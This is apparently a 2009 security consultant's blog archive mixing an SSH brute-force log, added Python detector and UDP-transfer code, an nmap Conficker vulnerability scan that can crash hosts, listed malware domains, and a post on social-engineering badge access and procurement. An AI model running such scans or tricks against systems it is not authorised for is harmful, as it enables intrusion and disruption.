Shahwan added that the police have recently seized large amounts of drugs and alcohol attached to the underside of automobiles passing through Erez crossing. The automobile owners admitted receiving help for smuggling the materials from Israeli intelligence operatives.

Monday 13 July 2009

Watson Research Center ssh scan

# grep "129.34.3.3" /var/log/messages
Jul 11 15:31:50 meij sshd[19894]: Failed password for root from 129.34.3.3 port 35477 ssh2
Jul 11 15:31:51 meij sshd[19896]: Failed password for root from 129.34.3.3 port 35702 ssh2
Jul 11 15:31:52 meij sshd[19898]: Failed password for root from 129.34.3.3 port 35873 ssh2
Jul 11 15:31:53 meij sshd[19900]: Failed password for root from 129.34.3.3 port 36003 ssh2
Jul 11 15:31:54 meij sshd[19902]: Failed password for root from 129.34.3.3 port 36177 ssh2
Jul 11 15:31:55 meij sshd[19904]: Failed password for root from 129.34.3.3 port 36332 ssh2
Jul 11 15:31:57 meij sshd[19906]: Failed password for root from 129.34.3.3 port 36462 ssh2
Jul 11 15:31:57 meij denyhosts: Added the following hosts to /etc/hosts.deny - 129.34.3.3 (vserv.watson.ibm.com)
Jul 11 15:31:58 meij sshd[19913]: Failed password for root from 129.34.3.3 port 36666 ssh2
Jul 11 15:31:59 meij sshd[19915]: Failed password for root from 129.34.3.3 port 36795 ssh2
Jul 11 15:32:00 meij sshd[19917]: Failed password for root from 129.34.3.3 port 36937 ssh2
Jul 11 15:32:01 meij sshd[19919]: Failed password for root from 129.34.3.3 port 37086 ssh2
Jul 11 15:32:02 meij sshd[19921]: Failed password for root from 129.34.3.3 port 37215 ssh2
Jul 11 15:32:03 meij sshd[19923]: Failed password for root from 129.34.3.3 port 37333 ssh2
Jul 11 15:32:04 meij sshd[19925]: Invalid user oracle from 129.34.3.3
Jul 11 15:32:04 meij sshd[19925]: Failed password for invalid user oracle from 129.34.3.3 port 37454 ssh2
Jul 11 15:32:05 meij sshd[19927]: Invalid user test from 129.34.3.3
Jul 11 15:32:05 meij sshd[19927]: Failed password for invalid user test from 129.34.3.3 port 37538 ssh2
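
The same excerpt run through a small detector, as an added example that is not part of the original post: it counts sshd "Failed password" lines per source address in a sliding window and checks how many failures were still logged after the denyhosts entry. The function names, the threshold of 5, the 30 second window and the `year` argument are assumptions of this example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Lines copied from the log excerpt in the post above.
SAMPLE_LOG = """\
Jul 11 15:31:50 meij sshd[19894]: Failed password for root from 129.34.3.3 port 35477 ssh2
Jul 11 15:31:51 meij sshd[19896]: Failed password for root from 129.34.3.3 port 35702 ssh2
Jul 11 15:31:52 meij sshd[19898]: Failed password for root from 129.34.3.3 port 35873 ssh2
Jul 11 15:31:53 meij sshd[19900]: Failed password for root from 129.34.3.3 port 36003 ssh2
Jul 11 15:31:54 meij sshd[19902]: Failed password for root from 129.34.3.3 port 36177 ssh2
Jul 11 15:31:55 meij sshd[19904]: Failed password for root from 129.34.3.3 port 36332 ssh2
Jul 11 15:31:57 meij sshd[19906]: Failed password for root from 129.34.3.3 port 36462 ssh2
Jul 11 15:31:57 meij denyhosts: Added the following hosts to /etc/hosts.deny - 129.34.3.3 (vserv.watson.ibm.com)
Jul 11 15:31:58 meij sshd[19913]: Failed password for root from 129.34.3.3 port 36666 ssh2
Jul 11 15:31:59 meij sshd[19915]: Failed password for root from 129.34.3.3 port 36795 ssh2
Jul 11 15:32:00 meij sshd[19917]: Failed password for root from 129.34.3.3 port 36937 ssh2
Jul 11 15:32:01 meij sshd[19919]: Failed password for root from 129.34.3.3 port 37086 ssh2
Jul 11 15:32:02 meij sshd[19921]: Failed password for root from 129.34.3.3 port 37215 ssh2
Jul 11 15:32:03 meij sshd[19923]: Failed password for root from 129.34.3.3 port 37333 ssh2
Jul 11 15:32:04 meij sshd[19925]: Invalid user oracle from 129.34.3.3
Jul 11 15:32:04 meij sshd[19925]: Failed password for invalid user oracle from 129.34.3.3 port 37454 ssh2
Jul 11 15:32:05 meij sshd[19927]: Invalid user test from 129.34.3.3
Jul 11 15:32:05 meij sshd[19927]: Failed password for invalid user test from 129.34.3.3 port 37538 ssh2
"""

# Only "Failed password" lines are counted; the "Invalid user" line that
# precedes some of them belongs to the same attempt (same sshd PID).
FAILED = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?P<invalid>invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)
BLOCKED = re.compile(
    r"denyhosts: Added the following hosts to /etc/hosts\.deny - (?P<ip>\S+)"
)


def detect(text, threshold=5, window=timedelta(seconds=30), year=2009):
    """Return a report for every source that reaches `threshold` failures
    inside `window`. Syslog timestamps carry no year, so it is passed in."""
    recent = defaultdict(deque)   # ip -> timestamps still inside the window
    report = {}
    for line in text.splitlines():
        m = FAILED.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        ip = m["ip"]
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()
        r = report.setdefault(ip, {"failures": 0, "users": set(),
                                   "invalid_users": set(), "first": ts,
                                   "last": ts, "tripped_at": None})
        r["failures"] += 1
        r["last"] = ts
        (r["invalid_users"] if m["invalid"] else r["users"]).add(m["user"])
        if r["tripped_at"] is None and len(q) >= threshold:
            r["tripped_at"] = ts
    return {ip: r for ip, r in report.items() if r["tripped_at"]}


def failures_after_block(text):
    """Count failed logins still logged after denyhosts listed the source."""
    blocked, late = set(), defaultdict(int)
    for line in text.splitlines():
        b = BLOCKED.search(line)
        if b:
            blocked.add(b["ip"])
            continue
        m = FAILED.match(line)
        if m and m["ip"] in blocked:
            late[m["ip"]] += 1
    return dict(late)


if __name__ == "__main__":
    for ip, r in detect(SAMPLE_LOG).items():
        print(ip, r["failures"], "failures, threshold reached at", r["tripped_at"],
              "accounts tried:", sorted(r["users"] | r["invalid_users"]))
    print("failures logged after hosts.deny entry:", failures_after_block(SAMPLE_LOG))
```
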

Unfortunately there is more amiss at IBM's Watson Research Center:

The original message was received at Mon, 13 Jul 2009 09:11:05 -0400
from spamguru010.watson.ibm.com [9.2.250.70]

----- The following addresses had permanent fatal errors -----
<nrt@watson.ibm.com>
(reason: 550 Host unknown)

----- Transcript of session follows -----
554 5.0.0 Service smokum@gmail.com unknown
550 5.1.2 <nrt@watson.ibm.com>... Host unknown (Name server: -f: host not found)

Final-Recipient: RFC822; nrt@watson.ibm.com
X-Actual-Recipient: RFC822; nrt@mailhub4.watson.ibm.com
Action: failed
Status: 5.1.2
Remote-MTA: DNS; -f
Diagnostic-Code: X-Unix; 550 Host unknown
Last-Attempt-Date: Mon, 13 Jul 2009 09:11:06 -0400

So I guess they'll need to read this blog to find out about their issues ;)
Good luck

Tuesday 16 June 2009

USENET but then FASTER: tsunami-udp FTW!


Downloading data via USENET has become the default FAST track for most DSL|Cable users. The data is nicely placed 'locally' and for a small fee, one gets priority access for 4, 8 or however many connections. Nice. Much faster than the old single-sourced HTTP access or the newer multiple-source BitTorrent [too many cheaters in BitTorrent country who do not obey the rule that one should at least have a share ratio of 1:1.20 or better].

Cool, so now we finally get to use all the bandwidth we pay the ISP for. But since the USENET servers are usually close to the endpoint, the case for a connection-oriented protocol like TCP is hard to make. UDP is a cheaper protocol and thus could increase the effective bandwidth since it requires less 'overhead'. The old-fashioned reasoning for using TCP over UDP is that UDP is only useful for transmissions where order isn't important and you don't need all of the messages to get to the other machine.

Other reasons for using TCP over UDP are that the upstream application needs less state awareness and since we like our coders dumb, we take that burden off of them.

But since our USENET servers are close, packet loss is not much of an issue. It is far more exceptional to lose packets. In the rare case we do, we could simply ask for a resend of that particular packet [or block].

So I went to BING [I have to admit I am impressed by the google-like results!] and asked "when is tcp better then udp". Hardly anything interesting showed at first glance. I repeated the same question to GOOGLE, more 'good' material was listed at first, but still not what I was looking for. BING has been set up to give me 100 results so I took a second look and found tsunami-udp at hit 38.

In pseudo-code, the server and client operate approximately like this:

**Server**
    start
    while(running) {
        wait(new incoming client TCP connection)
        fork server process:
        [
            check_authenticate(MD5, "kitten");
            exchange settings and values with client;
            while(live) {
                wait(request, nonblocking)
                switch(request) {
                    case no request received yet: { send next block in sequence; }
                    case request_stop: { close file, clean up; exit; }
                    case request_retransmit: { send requested blocks; }
                }
                sleep(throttling)
            }
        ]
    }

**Client**
    start, show command line
    while(running) {
        read user command;
        switch(command) {
            case command_exit: { clean up; exit; }
            case command_set: { edit the specified parameter; }
            case command_connect: { TCP connect to server; auth; protocol version compare;
                                    send some parameters; }
            case command_get && connected: {
                send get-file request containing all transfer parameters;
                read server response - filesize, block count;
                initialize bit array of received blocks, allocate retransmit list;
                start separate disk I/O thread;
                while (not received all blocks yet) {
                    receive_UDP();
                    if timeout { send retransmit request(); }

                    if block not marked as received yet in the bit array {
                        pass block to I/O thread for later writing to disk;
                        if block nr > expected block { add intermediate blocks to retransmit list; }
                    }

                    if it is time {
                        process retransmit list, send assembled request_retransmit to server;
                        send updated statistics to server, print to screen;
                    }
                }
                send request_stop;
                sync with disk I/O, finalize, clean up;
            }
            case command_help: { display available commands etc; }
        }
    }


It combines the strength of TCP [reliable data transfer] with the efficiency of UDP [no handshakes etc].

How It Works:
Tsunami performs a file transfer by sectioning the file into numbered blocks of usually 32kB size. Communication between the client and server applications flows over a low bandwidth TCP connection. The bulk data is transferred over UDP.

Most of the protocol intelligence is worked into the client code - the server simply sends out all blocks, and resends blocks that the client requests. The client specifies nearly all parameters of the transfer, such as the requested file name, target data rate, blocksize, target port, congestion behaviour, etc, and controls which blocks are requested from the server and when these requests are sent.
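
The client-side bookkeeping from the pseudo-code (bit array of received blocks, retransmit list filled when a block number jumps ahead, periodic retransmit requests, timeout when nothing arrives) as an added, simplified simulation; it is not tsunami-udp's own code. It runs in one process without sockets or the TCP authentication step, and `Server`, `receive_file`, `lost_datagrams` and `retransmit_interval` are names and parameters assumed for this example.

```python
BLOCK_SIZE = 32 * 1024  # "usually 32kB" according to the description above


class Server:
    """Sends blocks in sequence and resends whatever the client asks for."""

    def __init__(self, data, block_size=BLOCK_SIZE):
        self.data = data
        self.block_size = block_size
        self.block_count = -(-len(data) // block_size)  # ceiling division
        self.next_block = 1            # blocks are numbered from 1 here
        self.retransmit_queue = []

    def request_retransmit(self, block_numbers):
        # Simplification of this example: the latest request replaces the old one.
        self.retransmit_queue = list(block_numbers)

    def next_datagram(self):
        """Return (block_nr, payload), or None when there is nothing to send."""
        if self.retransmit_queue:
            nr = self.retransmit_queue.pop(0)
        elif self.next_block <= self.block_count:
            nr = self.next_block
            self.next_block += 1
        else:
            return None
        start = (nr - 1) * self.block_size
        return nr, self.data[start:start + self.block_size]


def receive_file(server, lost_datagrams=frozenset(), retransmit_interval=4):
    """Client loop. `lost_datagrams` holds the 1-based sequence numbers of
    datagrams that never arrive (constructed loss pattern, stands in for UDP)."""
    count = server.block_count
    bitmap = bytearray(count // 8 + 1)     # bit nr set = block nr received
    blocks = [None] * (count + 1)
    retransmit_list = []
    expected = 1
    received = 0
    stats = {"sent": 0, "retransmit_requests": 0}

    def have(nr):
        return bitmap[nr >> 3] & (1 << (nr & 7))

    while received < count:
        datagram = server.next_datagram()
        if datagram is None:
            # Nothing arrives any more: the client's timeout. This is what
            # recovers a lost final block, which no later block can reveal.
            missing = [nr for nr in range(1, count + 1) if not have(nr)]
            server.request_retransmit(missing)
            stats["retransmit_requests"] += 1
            continue
        stats["sent"] += 1
        nr, payload = datagram
        # Ignore datagrams lost in transit and blocks already marked received.
        if stats["sent"] not in lost_datagrams and not have(nr):
            bitmap[nr >> 3] |= 1 << (nr & 7)
            blocks[nr] = payload
            received += 1
            if nr > expected:
                # Gap: everything between expected and nr went missing.
                retransmit_list.extend(range(expected, nr))
            if nr >= expected:
                expected = nr + 1
        if stats["sent"] % retransmit_interval == 0:   # "if it is time"
            retransmit_list = [n for n in retransmit_list if not have(n)]
            if retransmit_list:
                server.request_retransmit(retransmit_list)
                stats["retransmit_requests"] += 1
    return b"".join(blocks[1:]), stats


if __name__ == "__main__":
    payload = bytes(range(38))                      # constructed 38-byte "file"
    out, stats = receive_file(Server(payload, block_size=4), lost_datagrams={3, 10})
    print(out == payload, stats)
```
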

Friday 12 June 2009

Peace Future School defrauding kids?

Someone thought it a good idea to help African people in & outside Africa and to do so, collect money from others. But how to get people to give you money? Well, one soft target are kids. So when you have a volunteer working for you who is linked to a school, why not use that opportunity?

So you register a site, copy the content [one page] of another site and sit back watching the kids donating money. Simple & potentially effective. Until a parent gets a little suspicious and decides to contact the school and ask them what this is all about. As it happens, the school knew as little as what the copied one paged website let them know: nothing really.

Another parent used some whois, some google-fu, some Maltego & some RL contacts in the fraud business. Everything found smells fishy, except the person who claims to be behind the Peace Future School. They go to extended lengths to assure the doubters that all is very legit, all is being done in good faith, there is no official registration YET, but surely that will be done one day, there is no content for the site YET but that too is on its way, there are many trustworthy people behind the project but not one links from their site to the Peace Future School YET but that will surely come.

But what is the truth? Is it just a bunch of innocent people who do not know how to set up a reliable looking site or are they fraudsters? I leave the verdict up to you, but for my kids there is no way they are going to be giving money to this particular initiative. No matter how much private money the spokeswoman claims to have spent on it, no matter how many well connected people she claims are behind it, no matter how strange and surprising it was to all volunteers that people are doubting, no matter how sad it makes her Nigerian partners to be confronted with suspicion, no matter how many volunteers are emailing from free email addresses.

The people behind this will not make the same mistake again. They now will get some links to and from the site, and some content, change the graphics, list some names, do some more foot work and all that jazz. They learned from the incident and will not make the same mistakes. So for the next person who gets contacted and who does some online research, it will get harder to find indications. That is worrying and reminds me of an experiment of the people behind Fake Trust.

Wednesday 10 June 2009

... completely change the way you shop!

"Remember the story about how you are going to be able to order coffee at Starbucks through the iPhone and then pay at the counter? Think bigger. The new iPhone 3.0 operating system and its push notifications and the in-app commerce features and abilities to pay through your account at the iTunes store, could completely change the way you shop. As you walk into any store, you could browse information about their products, order and pay and maybe have the goods delivered to your home, without having to stand in line and all the usual hassle associated with shopping. It is like on-line ordering with the added benefit of being able to squeeze, smell, and try out the products. The rumored improved camera with autofocus enables bar-code scanning. Sit in a comfy sofa at IKEA, order it, and that’s it. You just walk out. Or you could pick the goods up as you leave."

Sunday 7 June 2009

How is pronounced Twitxr?

Still a little rough around the edges, but who knows.

  

Friday 5 June 2009

Dictated but not dead

Listen, son: I am saying this as you lie asleep, one little paw crumpled under your cheek and the blond curls stickily wet on your damp forehead. I have stolen into your room alone.  Just a few minutes ago, as I sat reading my paper in the library, a stifling wave of remorse swept over me. Guiltily I came to your bedside. 

These are the things I was thinking, son: I had been cross to you. I scolded you as you were dressing for school because you gave your face merely a dab with a towel. I took you to task for not cleaning your shoes. I called out angrily when you threw some of your things on the floor. At breakfast I found fault, too. You spilled things. You gulped down your food. You put your elbows on the table. You spread butter too thick on your bread. And as you started off to play and I made for my train, you turned and waved a hand and called, "Goodbye, Daddy!" and I frowned, and said in reply, "Hold your shoulders back!" Then it began all over again in the late afternoon.

As I came up the road I spied you, down on your knees, playing marbles. There were holes in your stockings. I humiliated you before your boyfriends by marching you ahead of me to the house. Stockings were expensive-and if you had to buy them you would be more careful! Imagine that, son, from a father! Do you remember, later, when I was reading in the library, how you came in timidly, with a sort of hurt look in your eyes? 

When I glanced up over my paper, impatient at the interruption, you hesitated at the door. "What is it you want?" I snapped. You said nothing, but ran across in one tempestuous plunge, and threw your arms around my neck and kissed me, and your small arms tightened with an affection that God had set blooming in your heart and which even neglect could not wither. And then you were gone, pattering up the stairs.

Well, son, it was shortly afterwards that my paper slipped from my hands and a terrible sickening fear came over me. What has habit been doing to me? The habit of finding fault, of reprimanding-this was my reward to you for being a boy. It was not that I did not love you; it was that I expected too much of youth. I was measuring you by the yardstick of my own years. And there was so much that was good and fine and true in your character. The little heart of you was as big as the dawn itself over the wide hills. This was shown by your spontaneous impulse to rush in and kiss me good night. Nothing else matters tonight, son. I have come to your bedside in the darkness, and I have knelt there, ashamed! It is feeble atonement; I know you would not understand these things if I told them to you during your waking hours. But tomorrow I will be a real daddy! I will chum with you, and suffer when you suffer, and laugh when you laugh. I will bite my tongue when impatient words come. I will keep saying as if it were a ritual: "He is nothing but a boy-a little boy!" I am afraid I have visualized you as a man. Yet as I see you now, son, crumpled and weary in your cot, I see that you are still a baby. Yesterday you were in your mother's arms, your head on her shoulder. 

I have asked too much, too much.

Wednesday 3 June 2009

My blog blog crashes Firefox

I can not access the page you are looking at with my most favorite browser: Firefox. It crashes Firefox v3.0.10, released April 27, 2009

When you search for blog crashes firefox, the second link points to a story about Rob Levin's Spinhome blog crashing FF 1.5.0.2. In 1.5.0.3 it seemed to be fixed.

For me it happens not to be FF itself, but the addon NoScript, that I can not browse without anymore.

Wednesday 15 April 2009

BlackHat Europe drinks anyone?

Who's there? I know I am, I know Craig Balding is and Roelof Temmingh & Chris Bohme are, but will you?

This action packed and kick ass conference will show you where the community is at and what to expect in the [not so] near future. A -must- for IT [security] people who take their jobs seriously.

Not just the presentations but the informal meeting opportunities in & outside bars and rooms make BlackHat Europe so special. It's much smaller and more intimate than Las Vegas etc. This is one important reason speakers like it here so much. Not to mention the opportunity to explore this magical city, which is struck by a wave of the best weather in a loooong time.

Tuesday 14 April 2009

Kidney, anyone?

One of my best friends is due to get a 'new' kidney, today. Just like hosting a new service. New is relative here since the market for new grown kidneys is not that big so he gets one second hand, from his wife. Like using that compiled distributed application. While they spend time unconscious under the capable hands of one team of doctors, their 3 year old spends time at our house. Like having freelancers watching over your databases.

There is a lot of risk involved in the whole kidney transplantation deal. He will get a 'strange' organ implanted and his immune system will fight it to its or their death. Like your antiviral software battling a smartly written Trojan. To prevent this from succeeding he will be taking medication to reduce the effectiveness of his immune system, which in itself opens him up to a whole range of new dangers. Like placing a very large do not scan mask. See it as DMZ's or even extranet connectivity.

But before he gets anything, she will have to give. Like opening up your tightly secured local network. She's a healthy woman in the flowering ages and has absolutely 0 health issues. Like your internal NetWare file server. She's taking a statistically small risk, kidneys get removed and people operated on by the 1.000 every day. Like hosting your own domain. Still, statistics mean little in individual cases since either you live or you die, a rather black and white situation. Like the compromise of your network with a 0 day.

The risk person in us [we do sort of the same kinda work] made us prepare for the worst. Like a BCP for an earthquake in a country like Holland. They have officially made me guardian of the little them. I have full control over all their assets. Like having the root passwords. Just in case. You never know. The scenario of him kicking the bucket, they both not waking up and whatever other terrible scenarios have been discussed, face to face and measures have been taken to ensure life will be as good as possible for friend 2.0.

What can and needs to be arranged officially has been done. A will has been made, signed and sealed. List with invites & a formal chain of command have been made. Famous last words have been written. Religious & family matters been taken into account. Everything has been encrypted and securely distributed. The key hidden in Google's cache.

We also have friends over from a country where we lived for a couple of years.

Black Hat Europe will start for me tomorrow and my youngest daughter will go on her first real school holiday trip.

Later today the operation's team leader will call me to inform me of the preliminary results and I have been assigned the task to inform the selected family members, friends & colleagues.

Unless something goes dramatically wrong: then the phone will ring earlier.

Business as usual, nothing to see here, please move on.

Friday 10 April 2009

Safe browsing at google.com?

Google hosts a great club of smart people who do all sorts of groovy things. One of them is the "Safe Browsing Diagnostic". You can check sites yourself too [use this].



What happened when Google visited this site?

Of the 2709 pages we tested on the site over the past 90 days, 1 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-04-10, and the last time suspicious content was found on this site was on 2009-04-10.

Malicious software includes 1 scripting exploit(s), 1 trojan(s). Successful infection resulted in an average of 8 new process(es) on the target machine.

Malicious software is hosted on 3 domain(s), including v3i9.cn/, nvi3.cn/, said7.com/.

2 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including 74.125.77.0/, said7.com/.

This site was hosted on 4 network(s) including AS15169 (GOOGLE), AS26230 (TOTTAWA), AS6130 (ADN).


browsing google.com is not a safe idea anymore!

Thursday 9 April 2009

ING Internet payment site down again

ING is not doing too well, not to say bad. Lots of hocus pocus with your [and mine] money of the past couple of years have led to the current drama unfolding. This whole 'financial turmoil' might look far away from decent people's beds but it is not.

For 2 hours now the internet site for money transfers has not been working, and it greets you with "Welcome Null". What a great way to show your customer something 'technical' is wrong!



When I spoke to the helldesk for normal customers the lady told me there was a power issue in Amsterdam caused by the NUON. My [former] colleagues told me the power issue is in Rotterdam and the IBM mainframes & access switches went off the radar about 2 hours ago.

The largest local newspaper quoted an ING spokesperson saying "We do not know what the issue is at the moment"



All of this is not so bad if the issue happened 'any other normal day' but ING's luck or mismanagement make things look extra scary since they released a press note stating they are dropping 10 of the 12 [!!!] business units not directly related to banking.



Killing the super successful no nonsense Postbank right in the middle of the financial crisis was a bad stroke of luck, but as so often, when things start going wrong, they go very wrong. I hope for you you have taken measures that the actions of the management of this bank will not affect you and your loved ones too bad, because more news is in the making...

EDIT:
And of course things that 'go wrong' can be hilarious too. Here rally champion sjeik Mohamed Bin Sulayem in the ING sponsored F1:

Wednesday 1 April 2009

Nmap to find Conficker infected hosts


Get latest nmap (4.85BETA6 at the moment of writing) from:

http://nmap.org/dist/?C=M&O=D

run, with your own target network(s) in place of the placeholder on the last line:

sudo nmap -sC --script=smb-check-vulns --script-args=safe=1 -p445 \
-d -PN -n -T4 --min-hostgroup 256 --min-parallelism 64 \
-oA conficker_scan <target-network>

It is important to note that scanning for Conficker has a small chance of crashing an unpatched host. Patched and infected hosts won't be crashed though. Note that if Conficker itself scans unpatched hosts, they are even more likely to crash than with this check, so the benefits probably outweigh the drawbacks.

Find the source here.

Thursday 12 March 2009

nothing.. compares... to you

It's been... seven hours... and fifteen.. days
since you took... your love away
I go out... every night... and sleep all.. day
since you took... your love away
since.. you've been gone... I can do... whatever I want
I can do... whatever.. I choose
I can eat.. my dinner.. in a fancy.. restaurant
but nothing... can take away.. these blues
nothing compares
nothing compares.. to you

It's been.. so lonely... without.. you here
like a bird... without.. a song
nothing.. can stop... these lonely tears...
tell me baby... where did I. go wrong?
I could.. put my arms... around every girl I see
but they'd all... remind me. of you
I went.. to the doctor... guess what he.. told me
said you'd better have some fun
no matter what you do,
nothing compares
nothing compares... to you

All the flowers.. that you planted..
in the backyard
all died.... when you went.. away
I know that.. living with you.... was sometimes hard
but I'm willing.... to give it a try

nothing. compares
nothing compares... to you
nothing compares
nothing... compares... to you
nothing compares
nothing.. compares to you
nothing compares
nothing compares... to you
nothing compares
nothing.. compares... to you

Wednesday 11 March 2009

Dutch Chocolate == drop


For years I have been an addict and huge fan of the best chocolates in the world that are locally produced and sold in... Amsterdam. The company is called Puccini and has two shops. One conveniently located 5 minutes cycling from my home. Luckily the route to work does not take me past that shop so we have enough money left to buy real food too.

As I am on an assignment in Istanbul, I like to bring some 'typical' dutch presents with me to break the ice and compensate for all the presents and gifts I get from my colleagues when abroad. Stroopwafels are a safe bet, no matter where you go, as long as care is taken in warm climates in regards to transportation and the stains the syrup leaves.

Much to my surprise I was offered 'dutch chocolate' today while at the coffee break. For me, Dutch chocolate == Puccini. Nice! What an excellent start of the day!

Even more surprised I was when I found that the 'Dutch chocolate' was actually drop!

Drop makes me drool [Pavlof sends his greetings] but I am not that much a fan of it, but it is fun to see how not Dutch people react to it. Like haring, it is something you have to grow up with to like.

Sunday 8 March 2009

♫♫♫ ♫♫♫ Ton Lebbink ♫♫♫ ♫♫♫

The Dutch pop poet Ton Lebbink is a hero, at least, that is what I and a growing number of others think. Of course I have all his records, but my attempts to make decent mp3s of them have failed miserably. Fortunately they are for sale at Fonos.

Even cooler is that a lot of Ton Lebbink's work can now be found on YouTube too, so you can have a listen in case you don't know it yet.

Boodje Brood is also actively busy with Ton Lebbink [and more interesting stuff].

So hereby my listening tip:

Saturday 28 February 2009

RAPED once, SHAFTED twice and SCREWED as many times as Management deems appropriate.

Dear employees,

Due to the current financial situation caused by the slowdown of the economy, Management has decided to implement a scheme to put workers of 40 years of age and above on early retirement. This scheme will be known as RAPE (Retire Aged People Early).

Persons selected to be RAPED can apply to management to be eligible for the SHAFT scheme (Special Help After Forced Termination). Persons who have been RAPED and SHAFTED will be reviewed under the SCREW programme (Scheme Covering Retired Early Workers). A person may be RAPED once, SHAFTED twice and SCREWED as many times as Management deems appropriate.

Persons who have been RAPED can only get AIDS (Additional Income for Dependants & Spouse) or HERPES (Half Earnings for Retired Personnel Early Severance).

Obviously persons who have AIDS or HERPES will not be SHAFTED or SCREWED any further by Management.

Persons who are not RAPED and are staying on will receive as much SHIT (Special High Intensity Training) as possible. Management has always prided itself on the amount of SHIT it gives employees. Should you feel that you do not receive enough SHIT, please bring to the attention of your Supervisor. They have been trained to give you all the SHIT you can handle.

Sincerely, The Management

Wednesday 25 February 2009

Process hacking

When people I know start talking about 'hacking' in the original meaning of the word [making things happen by means that it was not designed for], we most of the time stick to some technical mumbo jumbo, as the boss likes to call it.

That is something our whole industry likes to do. Did and does. No matter how many times we get bitten in the arse by people doing things wrong, we like to forget about the art of social engineering, simply because it is too difficult to do something about and because it does not sell boxes that smell nice because they are new.

I have spent quite some time working for|in|with large organizations and these are the places where social engineering works best. Employees do not know each other, low-ranking employees have been given a bollocking by their 'superiors' for sticking to the rules, etc.

The bigger the organization, the larger the piles of documentation with rules and exceptions. Fertile ground for those who want to get things done, their way :P

Getting access to buildings is easy, especially with the no smoking inside. Every company has a percentage of people who are addicted and these people -will- find ways to get out & in without too much hassle. Be it the emergency exit, be it a rooftop, but like water: they will find a way.

A novel trick I found lately, used by some of the smokers who used to leave via the front door but were called into the manager's office after he'd seen the in-out timetable, is getting a visitor's pass for walking in & out unregistered. Smart. Of course I had to try to see how difficult it was to get one of those: frighteningly simple. Since so many had explained the situation to the security people, showing a packet of cigarettes was enough to trigger the knee jerk reaction of handing out a temporary access badge.

The same happens with the ordering process. Since all has been 'centralized' and 'standardized' it might take up to 6 months to get an order through [correct, this is a very bad and seldom example]. Because the supplier knows and has been trained to deliver orders before the paper work is 'completed', it is trivially simple to get any kind of hard & software shipped without passing the regular process. Most of the time the supplier will get his formalized order some time later but when he doesn't he just faxes the delivery notification to the ordering department and since they are used to things going wrong, they will send him a proforma so he will be able to bill.

It is more of the same with changes to infrastructure. All self-respecting organizations have CABs [Change Advisory Boards], where as we all know the most anal & inexperienced people waste their time, that take forever to approve the most basic changes but will happily waive through changes with impact beyond the minimal description. This is how 'the insiders' get things done: their old and trusted social network.

In the role of PM or as auditor I do the same. I spend a large part of my time sitting on desks, hanging around the coffee machine, lunching with [key-] people from the departments that actually do things. By constant name dropping and referring to 'john from RM', by reinforcing the well known fact that the official processes 'do not work' and 'the last reorganization undid the one before', by confirming that 'the management' costs & wastes money, I get my rules, my connections, my targets met and implemented.

So if you get all excited when you find company xyz is still running that well-known buggy version of the Internet-facing software, remember that I get the same happy feelings when I see people with ties and temporary badges :P

EDIT: Found people who actually give classes http://secinmotion.blogspot.com looks good.

Tuesday 17 February 2009

Oh that thing from yesterday? It was just a tiny little bug…

You gotta love the importance of the infra and the huge dependency on everybody playing nice, or better, knowing what they are doing.

Yesterday a tiny little outlet called SUPRO, spol. s r. in the middle of nowhere called Hradiste CZ, who manage AS 47868, blacked out part of the oh so crucial Internet. This was done [for all we know] without any bad intentions but Fast Fingered Freddy did manage to cause a stir in the smooth user experience our beloved browsers are so used to.


As shown here there were a couple of countries suffering from their outdated routers but users of all countries might have traffic passing these.

A Basterd's Work is Never Done


Ah, nice! Time to get some laughs and warm feelings about 'bad' things.

The movie lifting [insider story of a friend of mine who worked over at a video rental and who told me he hired movies that he never brought back] Quentin Tarantino makes a new movie.

Chopping up Nazis is a cool thing, in whatever way, shape or form so I am looking forward to the torrents in May :P

Friday 23 January 2009

L’Chayalim B’Ahava!

It's easy to sit back and watch TV, read a newspaper and forget about the hardship real people have to go through to [attempt] to bring peace & safety to a young nation.

There is a simple way to express your worldly appreciation to those that do the work.

Monday 5 January 2009

Working in IT? Read this!

Note: this is NOT written by me, you can tell, too well worded and it even makes sense. This is all written by Cormac O'Reilly and published at the world famous TheRegister.

As Sodor wakes to a new year, Thomas and his friends notice some very disturbing things...

The end of the IT world train is arriving at platform one

Cheaper hardware and software prices in 2009 means that IT becomes an increasingly throwaway business. We're there with printers, and other plug-ins: expect much the same with PCs, small servers, most storage and productivity software.

Software has gone from purchase, to rental, to free open systems and is now rapidly moving to online service. But the growing mindset is to load up on low-cost standby equipment, and scrap the original when it goes wrong. In this environment, the clever IT specialist and expensive performance monitoring tools have less and less to do.

Forget complex processor technology or clever storage solutions. Install massive redundancy of cheap commodity gear. Google pioneered this approach in building its (and the world's largest) IT infrastructure, and established that this pays big dividends and provides incredible performance. Expect this express train to arrive in 2009 and pick up more and more passengers. Don't be surprised if Google is not just the driver, but owns the railway company.

Base-line IT services hit the buffers

Talking of Google the Tank, expect a corporate flight to its Apps and productivity tools (like Gmail) in 2009.

Google has positioned itself to be in this business, just as Amazon did in running other companies' electronic shops. Many of the big corporate names have been tire kicking Google services for months. It's obvious that they are well run, highly reliable and accessible. Commodity "dial tone" services offer better quality, performance and capability than anything the traditional legacy players can supply, and make in-house provision of these services economically laughable.

Clever old Google provides ever better tools to migrate corporate services to its platform. These tools get easier to use, introduce stellar security and avoid the need for - gasp - overpaid IT people, complex software and expensive infrastructure. Expect these services to go the way of payroll. This was once a must in-house application, now it is a must outsource.

The train leaving for Asia is loaded with bundled back office services

Expect Asian outsourcers to climb over the European and US traditional outsource players (like EDS/HP and Accenture) and in-house IT organizations, and sell directly to administrative corporate functions in 2009. They already provide the people-centric intellectual IT engines of the world. So why should they not get as much of the margin as possible?

Call centers are a thing of the past - application software maintenance is increasingly low margin, so expect pressure for bundled back office operations - that's transaction touch, rather than customer touch. I expect 2009 will be the beginning of the end of in-house IT services.

Remember, if you are not adding clear value, then you must be adding pure cost. And the tolerance for this will be thinner than atomic particles in 2009 and beyond.

